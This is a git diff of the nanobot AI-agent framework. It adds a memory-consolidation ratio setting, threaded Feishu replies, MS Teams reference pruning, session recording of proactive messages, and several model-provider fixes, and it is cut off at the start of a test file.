diff --git a/nanobot/agent/loop.py b/nanobot/agent/loop.py index 7f830a0aa..a25528365 100644 --- a/nanobot/agent/loop.py +++ b/nanobot/agent/loop.py @@ -191,6 +191,7 @@ class AgentLoop: channels_config: ChannelsConfig | None = None, timezone: str | None = None, session_ttl_minutes: int = 0, + consolidation_ratio: float = 0.5, hooks: list[AgentHook] | None = None, unified_session: bool = False, disabled_skills: list[str] | None = None, @@ -274,6 +275,7 @@ class AgentLoop: build_messages=self.context.build_messages, get_tool_definitions=self.tools.get_definitions, max_completion_tokens=provider.generation.max_tokens, + consolidation_ratio=consolidation_ratio, ) self.auto_compact = AutoCompact( sessions=self.sessions, diff --git a/nanobot/agent/memory.py b/nanobot/agent/memory.py index 16c01d31c..cc14ea744 100644 --- a/nanobot/agent/memory.py +++ b/nanobot/agent/memory.py @@ -435,6 +435,7 @@ class Consolidator: build_messages: Callable[..., list[dict[str, Any]]], get_tool_definitions: Callable[[], list[dict[str, Any]]], max_completion_tokens: int = 4096, + consolidation_ratio: float = 0.5, ): self.store = store self.provider = provider @@ -442,6 +443,7 @@ class Consolidator: self.sessions = sessions self.context_window_tokens = context_window_tokens self.max_completion_tokens = max_completion_tokens + self.consolidation_ratio = consolidation_ratio self._build_messages = build_messages self._get_tool_definitions = get_tool_definitions self._locks: weakref.WeakValueDictionary[str, asyncio.Lock] = ( @@ -568,7 +570,7 @@ class Consolidator: lock = self.get_lock(session.key) async with lock: budget = self._input_token_budget - target = budget // 2 + target = int(budget * self.consolidation_ratio) try: estimated, source = self.estimate_session_prompt_tokens( session, diff --git a/nanobot/agent/tools/message.py b/nanobot/agent/tools/message.py index ee78df467..ea7f91bc8 100644 --- a/nanobot/agent/tools/message.py +++ b/nanobot/agent/tools/message.py @@ -42,6 +42,10 @@ class MessageTool(Tool): default=default_message_id, ) self._sent_in_turn_var: ContextVar[bool] = ContextVar("message_sent_in_turn", default=False) + self._record_channel_delivery_var: ContextVar[bool] = ContextVar( + "message_record_channel_delivery", + default=False, + ) def set_context(self, channel: str, chat_id: str, message_id: str | None = None) -> None: """Set the current message context.""" @@ -57,6 +61,14 @@ class MessageTool(Tool): """Reset per-turn send tracking.""" self._sent_in_turn = False + def set_record_channel_delivery(self, active: bool): + """Mark tool-sent messages as proactive channel deliveries.""" + return self._record_channel_delivery_var.set(active) + + def reset_record_channel_delivery(self, token) -> None: + """Restore previous proactive delivery recording state.""" + self._record_channel_delivery_var.reset(token) + @property def _sent_in_turn(self) -> bool: return self._sent_in_turn_var.get() @@ -117,15 +129,19 @@ class MessageTool(Tool): if not self._send_callback: return "Error: Message sending not configured" + metadata = { + "message_id": message_id, + } if message_id else {} + if self._record_channel_delivery_var.get(): + metadata["_record_channel_delivery"] = True + msg = OutboundMessage( channel=channel, chat_id=chat_id, content=content, media=media or [], buttons=buttons or [], - metadata={ - "message_id": message_id, - } if message_id else {}, + metadata=metadata, ) try: diff --git a/nanobot/agent/tools/shell.py b/nanobot/agent/tools/shell.py index aa8ca67b1..9484c73f7 100644 --- a/nanobot/agent/tools/shell.py +++ b/nanobot/agent/tools/shell.py @@ -136,9 +136,10 @@ class ExecTool(Tool): if self.path_append: if _IS_WINDOWS: - env["PATH"] = env.get("PATH", "") + ";" + self.path_append + env["PATH"] = env.get("PATH", "") + os.pathsep + self.path_append else: - command = f'export PATH="$PATH:{self.path_append}"; {command}' + env["NANOBOT_PATH_APPEND"] = self.path_append + command = f'export PATH="$PATH{os.pathsep}$NANOBOT_PATH_APPEND"; {command}' try: process = await self._spawn(command, cwd, env) @@ -298,8 +299,8 @@ class ExecTool(Tool): continue media_path = get_media_dir().resolve() - if (p.is_absolute() - and cwd_path not in p.parents + if (p.is_absolute() + and cwd_path not in p.parents and p != cwd_path and media_path not in p.parents and p != media_path diff --git a/nanobot/channels/feishu.py b/nanobot/channels/feishu.py index 41e937801..57260e906 100644 --- a/nanobot/channels/feishu.py +++ b/nanobot/channels/feishu.py @@ -13,6 +13,7 @@ from dataclasses import dataclass from typing import Any, Literal from lark_oapi.api.im.v1.model import MentionEvent, P2ImMessageReceiveV1 +from lark_oapi.core.const import FEISHU_DOMAIN, LARK_DOMAIN from loguru import logger from pydantic import Field @@ -22,8 +23,6 @@ from nanobot.channels.base import BaseChannel from nanobot.config.paths import get_media_dir from nanobot.config.schema import Base -from lark_oapi.core.const import FEISHU_DOMAIN, LARK_DOMAIN - FEISHU_AVAILABLE = importlib.util.find_spec("lark_oapi") is not None # Message type display mapping @@ -308,6 +307,8 @@ class FeishuChannel(BaseChannel): self._loop: asyncio.AbstractEventLoop | None = None self._stream_bufs: dict[str, _FeishuStreamBuf] = {} self._bot_open_id: str | None = None + self._background_tasks: set[asyncio.Task] = set() + self._reaction_ids: dict[str, str] = {} # message_id → reaction_id @staticmethod def _register_optional_event(builder: Any, method_name: str, handler: Any) -> Any: @@ -549,8 +550,11 @@ class FeishuChannel(BaseChannel): return None async def _add_reaction(self, message_id: str, emoji_type: str = "THUMBSUP") -> str | None: - """ - Add a reaction emoji to a message (non-blocking). + """Add a reaction emoji to a message. + + Returns the reaction_id on success, None on failure. + When called via a tracked background task, the returned reaction_id + is stored in ``_reaction_ids`` for later cleanup by ``send_delta``. Common emoji types: THUMBSUP, OK, EYES, DONE, OnIt, HEART """ @@ -594,6 +598,36 @@ class FeishuChannel(BaseChannel): loop = asyncio.get_running_loop() await loop.run_in_executor(None, self._remove_reaction_sync, message_id, reaction_id) + def _on_background_task_done(self, task: asyncio.Task) -> None: + """Callback: remove from tracking set and log unhandled exceptions.""" + self._background_tasks.discard(task) + if task.cancelled(): + return + try: + task.result() + except Exception as exc: + logger.warning("Background task failed: {}", exc) + + def _on_reaction_added(self, message_id: str, task: asyncio.Task) -> None: + """Callback: store reaction_id after background add-reaction completes.""" + if task.cancelled(): + return + try: + reaction_id = task.result() + if reaction_id: + self._reaction_ids[message_id] = reaction_id + except Exception: + pass # already logged by _on_background_task_done + # Trim cache to prevent unbounded growth + if len(self._reaction_ids) > 500: + self._reaction_ids.pop(next(iter(self._reaction_ids))) + + @staticmethod + def _stream_key(chat_id: str, metadata: dict[str, Any] | None = None) -> str: + """Scope streaming buffers to the inbound message when available.""" + meta = metadata or {} + return meta.get("message_id") or chat_id + # Regex to match markdown tables (header + separator + data rows) _TABLE_RE = re.compile( r"((?:^[ \t]*\|.+\|[ \t]*\n)(?:^[ \t]*\|[-:\s|]+\|[ \t]*\n)(?:^[ \t]*\|.+\|[ \t]*\n?)+)", @@ -1101,17 +1135,23 @@ class FeishuChannel(BaseChannel): logger.debug("Feishu: error fetching parent message {}: {}", message_id, e) return None - def _reply_message_sync(self, parent_message_id: str, msg_type: str, content: str) -> bool: - """Reply to an existing Feishu message using the Reply API (synchronous).""" + def _reply_message_sync(self, parent_message_id: str, msg_type: str, content: str, *, reply_in_thread: bool = False) -> bool: + """Reply to an existing Feishu message using the Reply API (synchronous). + + Args: + reply_in_thread: If True, reply as a thread/topic message + in the Feishu client. + """ from lark_oapi.api.im.v1 import ReplyMessageRequest, ReplyMessageRequestBody try: + body_builder = ReplyMessageRequestBody.builder().msg_type(msg_type).content(content) + if reply_in_thread: + body_builder = body_builder.reply_in_thread(True) request = ( ReplyMessageRequest.builder() .message_id(parent_message_id) - .request_body( - ReplyMessageRequestBody.builder().msg_type(msg_type).content(content).build() - ) + .request_body(body_builder.build()) .build() ) response = self._client.im.v1.message.reply(request) @@ -1166,8 +1206,19 @@ class FeishuChannel(BaseChannel): logger.error("Error sending Feishu {} message: {}", msg_type, e) return None - def _create_streaming_card_sync(self, receive_id_type: str, chat_id: str) -> str | None: - """Create a CardKit streaming card, send it to chat, return card_id.""" + def _create_streaming_card_sync( + self, + receive_id_type: str, + chat_id: str, + reply_message_id: str | None = None, + ) -> str | None: + """Create a CardKit streaming card, send it to chat, return card_id. + + When *reply_message_id* is provided the card is delivered via the + reply API (with reply_in_thread=True) so it lands inside the + originating thread / topic. Otherwise the plain create-message + API is used. + """ from lark_oapi.api.cardkit.v1 import CreateCardRequest, CreateCardRequestBody card_json = { @@ -1196,13 +1247,19 @@ class FeishuChannel(BaseChannel): return None card_id = getattr(response.data, "card_id", None) if card_id: - message_id = self._send_message_sync( - receive_id_type, - chat_id, - "interactive", - json.dumps({"type": "card", "data": {"card_id": card_id}}), + card_content = json.dumps( + {"type": "card", "data": {"card_id": card_id}}, ensure_ascii=False ) - if message_id: + if reply_message_id: + sent = self._reply_message_sync( + reply_message_id, "interactive", card_content, + reply_in_thread=True, + ) + else: + sent = self._send_message_sync( + receive_id_type, chat_id, "interactive", card_content, + ) is not None + if sent: return card_id logger.warning( "Created streaming card {} but failed to send it to {}", card_id, chat_id @@ -1292,23 +1349,27 @@ class FeishuChannel(BaseChannel): _stream_end: Finalize the streaming card. _tool_hint: Delta is a formatted tool hint (for display only). message_id: Original message id (used with _stream_end for reaction cleanup). - reaction_id: Reaction id to remove on stream end. + chat_type: "group" or "p2p" — controls reply-in-thread for streaming cards. """ if not self._client: return meta = metadata or {} + stream_key = self._stream_key(chat_id, meta) loop = asyncio.get_running_loop() rid_type = "chat_id" if chat_id.startswith("oc_") else "open_id" # --- stream end: final update or fallback --- if meta.get("_stream_end"): - if (message_id := meta.get("message_id")) and (reaction_id := meta.get("reaction_id")): - await self._remove_reaction(message_id, reaction_id) + message_id = meta.get("message_id") + if message_id: + reaction_id = self._reaction_ids.pop(message_id, None) + if reaction_id: + await self._remove_reaction(message_id, reaction_id) # Add completion emoji if configured - if self.config.done_emoji and message_id: + if self.config.done_emoji: await self._add_reaction(message_id, self.config.done_emoji) - buf = self._stream_bufs.pop(chat_id, None) + buf = self._stream_bufs.pop(stream_key, None) if not buf or not buf.text: return # Try to finalize via streaming card; if that fails (e.g. @@ -1343,24 +1404,45 @@ class FeishuChannel(BaseChannel): {"config": {"wide_screen_mode": True}, "elements": chunk}, ensure_ascii=False, ) - await loop.run_in_executor( - None, self._send_message_sync, rid_type, chat_id, "interactive", card - ) + # Fallback: reply via the Reply API for group chats. + # Target message_id — the Feishu API keeps the reply in + # the same topic automatically. + _f_msg = meta.get("message_id") + fallback_msg_id = _f_msg if meta.get("chat_type", "group") == "group" else None + if fallback_msg_id: + await loop.run_in_executor( + None, lambda: self._reply_message_sync( + fallback_msg_id, "interactive", card, + reply_in_thread=True, + ), + ) + else: + await loop.run_in_executor( + None, self._send_message_sync, rid_type, chat_id, "interactive", card + ) return # --- accumulate delta --- - buf = self._stream_bufs.get(chat_id) + buf = self._stream_bufs.get(stream_key) if buf is None: buf = _FeishuStreamBuf() - self._stream_bufs[chat_id] = buf + self._stream_bufs[stream_key] = buf buf.text += delta if not buf.text.strip(): return now = time.monotonic() if buf.card_id is None: + # Send the streaming card as a reply for group chats so it + # lands inside the originating topic/thread. Always target + # message_id (the actual inbound message) — the Feishu Reply + # API keeps the response in the same topic automatically. + is_group = meta.get("chat_type", "group") == "group" + reply_msg_id = meta.get("message_id") if is_group else None card_id = await loop.run_in_executor( - None, self._create_streaming_card_sync, rid_type, chat_id + None, + self._create_streaming_card_sync, + rid_type, chat_id, reply_msg_id, ) if card_id: buf.card_id = card_id @@ -1393,7 +1475,7 @@ class FeishuChannel(BaseChannel): hint = (msg.content or "").strip() if not hint: return - buf = self._stream_bufs.get(msg.chat_id) + buf = self._stream_bufs.get(self._stream_key(msg.chat_id, msg.metadata)) if buf and buf.card_id: # Delegate to send_delta so tool hints get the same # throttling (and card creation) as regular text deltas. @@ -1404,37 +1486,59 @@ class FeishuChannel(BaseChannel): return # No active streaming card — send as a regular # interactive card with the same 🔧 prefix style. + # Use reply API for group chats so the hint stays in topic. card = json.dumps( {"config": {"wide_screen_mode": True}, "elements": [ {"tag": "markdown", "content": self._format_tool_hint_delta(hint)}, ]}, ensure_ascii=False, ) - await loop.run_in_executor( - None, self._send_message_sync, receive_id_type, msg.chat_id, "interactive", card - ) + _th_msg_id = msg.metadata.get("message_id") + _th_chat_type = msg.metadata.get("chat_type", "group") + if _th_msg_id and _th_chat_type == "group": + await loop.run_in_executor( + None, lambda: self._reply_message_sync( + _th_msg_id, "interactive", card, + reply_in_thread=True, + ), + ) + else: + await loop.run_in_executor( + None, self._send_message_sync, receive_id_type, msg.chat_id, "interactive", card + ) return # Determine whether the first message should quote the user's message. # Only the very first send (media or text) in this call uses reply; subsequent # chunks/media fall back to plain create to avoid redundant quote bubbles. + # Always target message_id — the Feishu Reply API keeps replies in the + # same topic automatically when the target message is inside a topic. reply_message_id: str | None = None + _msg_id = msg.metadata.get("message_id") if self.config.reply_to_message and not msg.metadata.get("_progress", False): - reply_message_id = msg.metadata.get("message_id") or None + reply_message_id = _msg_id # For topic group messages, always reply to keep context in thread elif msg.metadata.get("thread_id"): - reply_message_id = ( - msg.metadata.get("root_id") or msg.metadata.get("message_id") or None - ) + reply_message_id = _msg_id first_send = True # tracks whether the reply has already been used def _do_send(m_type: str, content: str) -> None: - """Send via reply (first message) or create (subsequent).""" + """Send via reply (first message) or create (subsequent). + + For group chats the reply API always uses reply_in_thread=True. + The Feishu API automatically keeps replies inside existing + topics — reply_in_thread only creates a *new* topic when the + target message is a plain (non-topic) message. + """ nonlocal first_send if reply_message_id and first_send: first_send = False - ok = self._reply_message_sync(reply_message_id, m_type, content) + chat_type = msg.metadata.get("chat_type", "group") + ok = self._reply_message_sync( + reply_message_id, m_type, content, + reply_in_thread=chat_type == "group", + ) if ok: return # Fall back to regular send if reply fails @@ -1543,8 +1647,13 @@ class FeishuChannel(BaseChannel): logger.debug("Feishu: skipping group message (not mentioned)") return - # Add reaction - reaction_id = await self._add_reaction(message_id, self.config.react_emoji) + # Add reaction (non-blocking — tracked background task) + task = asyncio.create_task( + self._add_reaction(message_id, self.config.react_emoji) + ) + self._background_tasks.add(task) + task.add_done_callback(self._on_background_task_done) + task.add_done_callback(lambda t: self._on_reaction_added(message_id, t)) # Parse content content_parts = [] @@ -1624,6 +1733,15 @@ class FeishuChannel(BaseChannel): if not content and not media_paths: return + # Build topic-scoped session key for conversation isolation. + # Group chat: each topic gets its own session via root_id (replies + # inside a topic) or message_id (top-level messages start a new topic). + # Private chat: no override — same behavior as Telegram/Slack. + if chat_type == "group": + session_key = f"feishu:{chat_id}:{root_id or message_id}" + else: + session_key = None + # Forward to message bus reply_to = chat_id if chat_type == "group" else sender_id await self._handle_message( @@ -1633,13 +1751,13 @@ class FeishuChannel(BaseChannel): media=media_paths, metadata={ "message_id": message_id, - "reaction_id": reaction_id, "chat_type": chat_type, "msg_type": msg_type, "parent_id": parent_id, "root_id": root_id, "thread_id": thread_id, }, + session_key=session_key, ) except Exception as e: diff --git a/nanobot/channels/msteams.py b/nanobot/channels/msteams.py index 427b35f8c..f1c0ac1bc 100644 --- a/nanobot/channels/msteams.py +++ b/nanobot/channels/msteams.py @@ -70,6 +70,7 @@ class ConversationRef: activity_id: str | None = None conversation_type: str | None = None tenant_id: str | None = None + updated_at: float | None = None class MSTeamsChannel(BaseChannel): @@ -220,7 +221,6 @@ class MSTeamsChannel(BaseChannel): token = await self._get_access_token() base_url = f"{ref.service_url.rstrip('/')}/v3/conversations/{ref.conversation_id}/activities" use_thread_reply = self.config.reply_in_thread and bool(ref.activity_id) - url = f"{base_url}/{ref.activity_id}" if use_thread_reply else base_url headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json", @@ -233,7 +233,7 @@ class MSTeamsChannel(BaseChannel): payload["replyToId"] = ref.activity_id try: - resp = await self._http.post(url, headers=headers, json=payload) + resp = await self._http.post(base_url, headers=headers, json=payload) resp.raise_for_status() logger.info("MSTeams message sent to {}", ref.conversation_id) except Exception as e: @@ -289,7 +289,9 @@ class MSTeamsChannel(BaseChannel): activity_id=activity_id or None, conversation_type=conversation_type or None, tenant_id=str((channel_data.get("tenant") or {}).get("id") or "") or None, + updated_at=time.time(), ) + self._save_refs() await self._handle_message( @@ -310,10 +312,12 @@ class MSTeamsChannel(BaseChannel): """Extract the user-authored text from a Teams activity.""" text = str(activity.get("text") or "") text = self._strip_possible_bot_mention(text) + text = self._normalize_html_whitespace(text) channel_data = activity.get("channelData") or {} reply_to_id = str(activity.get("replyToId") or "").strip() normalized_preview = html.unescape(text).replace("&rsquo", "’").strip() + normalized_preview = normalized_preview.replace("\xa0", " ") normalized_preview = normalized_preview.replace("\r\n", "\n").replace("\r", "\n") preview_lines = [line.strip() for line in normalized_preview.split("\n")] while preview_lines and not preview_lines[0]: @@ -333,9 +337,15 @@ class MSTeamsChannel(BaseChannel): cleaned = re.sub(r"(?:\r?\n){3,}", "\n\n", cleaned) return cleaned.strip() + def _normalize_html_whitespace(self, text: str) -> str: + """Normalize common HTML whitespace/entities from Teams into plain text spacing.""" + normalized = html.unescape(text).replace("&rsquo", "’") + normalized = normalized.replace("\xa0", " ") + return normalized + def _normalize_teams_reply_quote(self, text: str) -> str: """Normalize Teams quoted replies into a compact structured form.""" - cleaned = html.unescape(text).replace("&rsquo", "’").strip() + cleaned = self._normalize_html_whitespace(text).strip() if not cleaned: return "" @@ -494,6 +504,14 @@ class MSTeamsChannel(BaseChannel): def _save_refs(self) -> None: """Persist conversation references.""" try: + stale_keys = [ + key + for key, ref in self._conversation_refs.items() + if self._is_stale_or_unsupported_ref(ref) + ] + for key in stale_keys: + self._conversation_refs.pop(key, None) + data = { key: { "service_url": ref.service_url, @@ -502,6 +520,7 @@ class MSTeamsChannel(BaseChannel): "activity_id": ref.activity_id, "conversation_type": ref.conversation_type, "tenant_id": ref.tenant_id, + "updated_at": ref.updated_at, } for key, ref in self._conversation_refs.items() } @@ -509,6 +528,21 @@ class MSTeamsChannel(BaseChannel): except Exception as e: logger.warning("Failed to save MSTeams conversation refs: {}", e) + def _is_stale_or_unsupported_ref(self, ref: ConversationRef) -> bool: + """Reject unsupported refs and prune old refs.""" + service_url = (ref.service_url or "").strip().lower() + conversation_type = (ref.conversation_type or "").strip().lower() + updated_at = ref.updated_at or 0.0 + max_age_seconds = 30 * 24 * 60 * 60 + + if "webchat.botframework.com" in service_url: + return True + if conversation_type and conversation_type != "personal": + return True + if updated_at and updated_at < time.time() - max_age_seconds: + return True + return False + async def _get_access_token(self) -> str: """Fetch an access token for Bot Framework / Azure Bot auth.""" diff --git a/nanobot/cli/commands.py b/nanobot/cli/commands.py index 088433055..22bb8b825 100644 --- a/nanobot/cli/commands.py +++ b/nanobot/cli/commands.py @@ -537,6 +537,7 @@ def serve( unified_session=runtime_config.agents.defaults.unified_session, disabled_skills=runtime_config.agents.defaults.disabled_skills, session_ttl_minutes=runtime_config.agents.defaults.session_ttl_minutes, + consolidation_ratio=runtime_config.agents.defaults.consolidation_ratio, tools_config=runtime_config.tools, ) @@ -597,6 +598,8 @@ def _run_gateway( """Shared gateway runtime; ``open_browser_url`` opens a tab once channels are up.""" from nanobot.agent.loop import AgentLoop from nanobot.agent.runtime import build_agent_runtime, load_agent_runtime + from nanobot.agent.tools.cron import CronTool + from nanobot.agent.tools.message import MessageTool from nanobot.bus.queue import MessageBus from nanobot.channels.manager import ChannelManager from nanobot.cron.service import CronService @@ -647,11 +650,52 @@ def _run_gateway( unified_session=config.agents.defaults.unified_session, disabled_skills=config.agents.defaults.disabled_skills, session_ttl_minutes=config.agents.defaults.session_ttl_minutes, + consolidation_ratio=config.agents.defaults.consolidation_ratio, tools_config=config.tools, runtime_loader=load_agent_runtime, runtime_signature=runtime.signature, ) + from nanobot.agent.loop import UNIFIED_SESSION_KEY + from nanobot.bus.events import OutboundMessage + + def _channel_session_key(channel: str, chat_id: str) -> str: + return ( + UNIFIED_SESSION_KEY + if config.agents.defaults.unified_session + else f"{channel}:{chat_id}" + ) + + async def _deliver_to_channel(msg: OutboundMessage, *, record: bool = False) -> None: + """Publish a user-visible message and mirror it into that channel's session.""" + metadata = dict(msg.metadata or {}) + record = record or bool(metadata.pop("_record_channel_delivery", False)) + if metadata != (msg.metadata or {}): + msg = OutboundMessage( + channel=msg.channel, + chat_id=msg.chat_id, + content=msg.content, + reply_to=msg.reply_to, + media=msg.media, + metadata=metadata, + buttons=msg.buttons, + ) + if ( + record + and msg.channel != "cli" + and msg.content.strip() + and hasattr(session_manager, "get_or_create") + and hasattr(session_manager, "save") + ): + session = session_manager.get_or_create(_channel_session_key(msg.channel, msg.chat_id)) + session.add_message("assistant", msg.content, _channel_delivery=True) + session_manager.save(session) + await bus.publish_outbound(msg) + + message_tool = getattr(agent, "tools", {}).get("message") + if isinstance(message_tool, MessageTool): + message_tool.set_send_callback(_deliver_to_channel) + # Set cron callback (needs agent) async def on_cron_job(job: CronJob) -> str | None: """Execute a cron job through the agent.""" @@ -664,8 +708,6 @@ def _run_gateway( logger.exception("Dream cron job failed") return None - from nanobot.agent.tools.cron import CronTool - from nanobot.agent.tools.message import MessageTool from nanobot.utils.evaluator import evaluate_response reminder_note = ( @@ -682,6 +724,10 @@ def _run_gateway( async def _silent(*_args, **_kwargs): pass + message_record_token = None + if isinstance(message_tool, MessageTool): + message_record_token = message_tool.set_record_channel_delivery(True) + try: resp = await agent.process_direct( reminder_note, @@ -693,10 +739,11 @@ def _run_gateway( finally: if isinstance(cron_tool, CronTool) and cron_token is not None: cron_tool.reset_cron_context(cron_token) + if isinstance(message_tool, MessageTool) and message_record_token is not None: + message_tool.reset_record_channel_delivery(message_record_token) response = resp.content if resp else "" - message_tool = agent.tools.get("message") if job.payload.deliver and isinstance(message_tool, MessageTool) and message_tool._sent_in_turn: return response @@ -705,12 +752,14 @@ def _run_gateway( response, reminder_note, provider, agent.model, ) if should_notify: - from nanobot.bus.events import OutboundMessage - await bus.publish_outbound(OutboundMessage( - channel=job.payload.channel or "cli", - chat_id=job.payload.to, - content=response, - )) + await _deliver_to_channel( + OutboundMessage( + channel=job.payload.channel or "cli", + chat_id=job.payload.to, + content=response, + ), + record=True, + ) return response cron.on_job = on_cron_job @@ -760,12 +809,22 @@ def _run_gateway( return resp.content if resp else "" async def on_heartbeat_notify(response: str) -> None: - """Deliver a heartbeat response to the user's channel.""" - from nanobot.bus.events import OutboundMessage + """Deliver a heartbeat response to the user's channel. + + In addition to publishing the outbound message, this injects the + delivered text as an assistant turn into the *target channel's* + session. Without this, a user reply on the channel (e.g. "Sure") + lands in a session that has no context about the heartbeat message + and the agent cannot follow through. + """ channel, chat_id = _pick_heartbeat_target() if channel == "cli": return # No external channel available to deliver to - await bus.publish_outbound(OutboundMessage(channel=channel, chat_id=chat_id, content=response)) + + await _deliver_to_channel( + OutboundMessage(channel=channel, chat_id=chat_id, content=response), + record=True, + ) hb_cfg = config.gateway.heartbeat heartbeat = HeartbeatService( @@ -968,6 +1027,7 @@ def agent( unified_session=config.agents.defaults.unified_session, disabled_skills=config.agents.defaults.disabled_skills, session_ttl_minutes=config.agents.defaults.session_ttl_minutes, + consolidation_ratio=config.agents.defaults.consolidation_ratio, tools_config=config.tools, ) restart_notice = consume_restart_notice_from_env() diff --git a/nanobot/config/schema.py b/nanobot/config/schema.py index cca8f210f..e1f91aeb0 100644 --- a/nanobot/config/schema.py +++ b/nanobot/config/schema.py @@ -90,6 +90,13 @@ class AgentDefaults(Base): validation_alias=AliasChoices("idleCompactAfterMinutes", "sessionTtlMinutes"), serialization_alias="idleCompactAfterMinutes", ) # Auto-compact idle threshold in minutes (0 = disabled) + consolidation_ratio: float = Field( + default=0.5, + ge=0.1, + le=0.95, + validation_alias=AliasChoices("consolidationRatio"), + serialization_alias="consolidationRatio", + ) # Consolidation target ratio (0.5 = 50% of budget retained after compression) dream: DreamConfig = Field(default_factory=DreamConfig) diff --git a/nanobot/nanobot.py b/nanobot/nanobot.py index 374f93541..4cd4a6a7f 100644 --- a/nanobot/nanobot.py +++ b/nanobot/nanobot.py @@ -84,6 +84,7 @@ class Nanobot: unified_session=defaults.unified_session, disabled_skills=defaults.disabled_skills, session_ttl_minutes=defaults.session_ttl_minutes, + consolidation_ratio=defaults.consolidation_ratio, tools_config=config.tools, ) return cls(loop) diff --git a/nanobot/providers/openai_compat_provider.py b/nanobot/providers/openai_compat_provider.py index f603b9e37..fdbad585c 100644 --- a/nanobot/providers/openai_compat_provider.py +++ b/nanobot/providers/openai_compat_provider.py @@ -3,17 +3,20 @@ from __future__ import annotations import asyncio -import json import hashlib import importlib.util +import json import os import secrets import string import time import uuid from collections.abc import Awaitable, Callable +from ipaddress import ip_address from typing import TYPE_CHECKING, Any +from urllib.parse import urlparse +import httpx import json_repair from loguru import logger @@ -159,6 +162,37 @@ _RESPONSES_FAILURE_THRESHOLD = 3 _RESPONSES_PROBE_INTERVAL_S = 300 # 5 minutes +def _is_local_endpoint( + spec: "ProviderSpec | None", + api_base: str | None, +) -> bool: + """Return True when the endpoint is a local or LAN model server. + + Matches either the provider spec's ``is_local`` flag or common private- + network patterns in the base URL (localhost, 127.x, 192.168.x, 10.x, + 172.16-31.x, Docker ``host.docker.internal``). + """ + if spec and spec.is_local: + return True + if not api_base: + return False + raw = api_base.strip().lower() + parsed = urlparse(raw if "://" in raw else f"//{raw}") + try: + host = parsed.hostname + except ValueError: + return False + if host in {"localhost", "host.docker.internal"}: + return True + if not host: + return False + try: + addr = ip_address(host) + except ValueError: + return False + return addr.is_loopback or addr.is_private + + def _is_direct_openai_base(api_base: str | None) -> bool: """Return True for direct OpenAI endpoints, not generic OpenAI-compatible gateways.""" if not api_base: @@ -208,11 +242,27 @@ class OpenAICompatProvider(LLMProvider): if extra_headers: default_headers.update(extra_headers) + # Local model servers (Ollama, llama.cpp, vLLM) often close idle + # HTTP connections before the client-side keepalive expires. When + # two LLM calls happen seconds apart (e.g. heartbeat _decide then + # process_direct), the second call may grab a now-dead pooled + # connection, causing a transient APIConnectionError on every first + # attempt. Disabling keepalive for local endpoints avoids this by + # opening a fresh connection for each request, which is cheap on a + # LAN. Cloud providers benefit from keepalive, so we leave the + # default pool settings for them. + http_client: httpx.AsyncClient | None = None + if _is_local_endpoint(spec, effective_base): + http_client = httpx.AsyncClient( + limits=httpx.Limits(keepalive_expiry=0), + ) + self._client = AsyncOpenAI( api_key=api_key or "no-key", base_url=effective_base, default_headers=default_headers, max_retries=0, + http_client=http_client, ) # Responses API circuit breaker: skip after repeated failures, @@ -334,6 +384,47 @@ class OpenAICompatProvider(LLMProvider): clean["tool_call_id"] = map_id(clean["tool_call_id"]) return self._enforce_role_alternation(sanitized) + def _drop_deepseek_incomplete_reasoning_history( + self, + messages: list[dict[str, Any]], + reasoning_effort: str | None, + ) -> list[dict[str, Any]]: + if ( + not self._spec + or self._spec.name != "deepseek" + or not reasoning_effort + or reasoning_effort.lower() == "none" + ): + return messages + + bad_idx = None + for idx, msg in enumerate(messages): + if ( + msg.get("role") == "assistant" + and msg.get("tool_calls") + and not msg.get("reasoning_content") + ): + bad_idx = idx + if bad_idx is None: + return messages + + keep_from = None + for idx in range(bad_idx + 1, len(messages)): + if messages[idx].get("role") == "user": + keep_from = idx + break + + if keep_from is None: + trimmed = messages[:bad_idx] + else: + prefix = [msg for msg in messages[:keep_from] if msg.get("role") == "system"] + trimmed = prefix + messages[keep_from:] + logger.warning( + "Dropped {} DeepSeek thinking history message(s) with incomplete reasoning_content", + len(messages) - len(trimmed), + ) + return trimmed + # ------------------------------------------------------------------ # Build kwargs # ------------------------------------------------------------------ @@ -374,6 +465,10 @@ class OpenAICompatProvider(LLMProvider): if spec and spec.strip_model_prefix: model_name = model_name.split("/")[-1] + messages = self._drop_deepseek_incomplete_reasoning_history( + messages, + reasoning_effort, + ) kwargs: dict[str, Any] = { "model": model_name, "messages": self._sanitize_messages(self._sanitize_empty_content(messages)), @@ -709,8 +804,8 @@ class OpenAICompatProvider(LLMProvider): finish_reason = str(choice0.get("finish_reason") or "stop") raw_tool_calls: list[Any] = [] - # StepFun Plan: fallback to reasoning field when content is empty - if not content and msg0.get("reasoning"): + # StepFun: fallback to reasoning field when content is empty + if not content and msg0.get("reasoning") and self._spec and self._spec.reasoning_as_content: content = self._extract_text_content(msg0.get("reasoning")) reasoning_content = msg0.get("reasoning_content") if not reasoning_content and msg0.get("reasoning"): @@ -770,7 +865,7 @@ class OpenAICompatProvider(LLMProvider): finish_reason = ch.finish_reason if not content and m.content: content = m.content - if not content and getattr(m, "reasoning", None): + if not content and getattr(m, "reasoning", None) and self._spec and self._spec.reasoning_as_content: content = m.reasoning tool_calls = [] diff --git a/nanobot/providers/registry.py b/nanobot/providers/registry.py index 5037e3003..6cb57cb04 100644 --- a/nanobot/providers/registry.py +++ b/nanobot/providers/registry.py @@ -71,6 +71,11 @@ class ProviderSpec: # "reasoning_split" — {"reasoning_split": true/false} (MiniMax) thinking_style: str = "" + # When True, treat the "reasoning" response field as formal content + # when "content" is empty. Only set this for providers (e.g. StepFun) + # whose API returns the actual answer in "reasoning" instead of "content". + reasoning_as_content: bool = False + @property def label(self) -> str: return self.display_name or self.name.title() @@ -325,6 +330,7 @@ PROVIDERS: tuple[ProviderSpec, ...] = ( display_name="Step Fun", backend="openai_compat", default_api_base="https://api.stepfun.com/v1", + reasoning_as_content=True, ), # Xiaomi MIMO (小米): OpenAI-compatible API ProviderSpec( diff --git a/nanobot/session/manager.py b/nanobot/session/manager.py index 69509a839..ddcfdea14 100644 --- a/nanobot/session/manager.py +++ b/nanobot/session/manager.py @@ -46,10 +46,14 @@ class Session: unconsolidated = self.messages[self.last_consolidated:] sliced = unconsolidated[-max_messages:] - # Avoid starting mid-turn when possible. + # Avoid starting mid-turn when possible, except for proactive + # assistant deliveries that the user may be replying to. for i, message in enumerate(sliced): if message.get("role") == "user": - sliced = sliced[i:] + start = i + if i > 0 and sliced[i - 1].get("_channel_delivery"): + start = i - 1 + sliced = sliced[start:] break # Drop orphan tool results at the front. diff --git a/tests/agent/test_consolidation_ratio.py 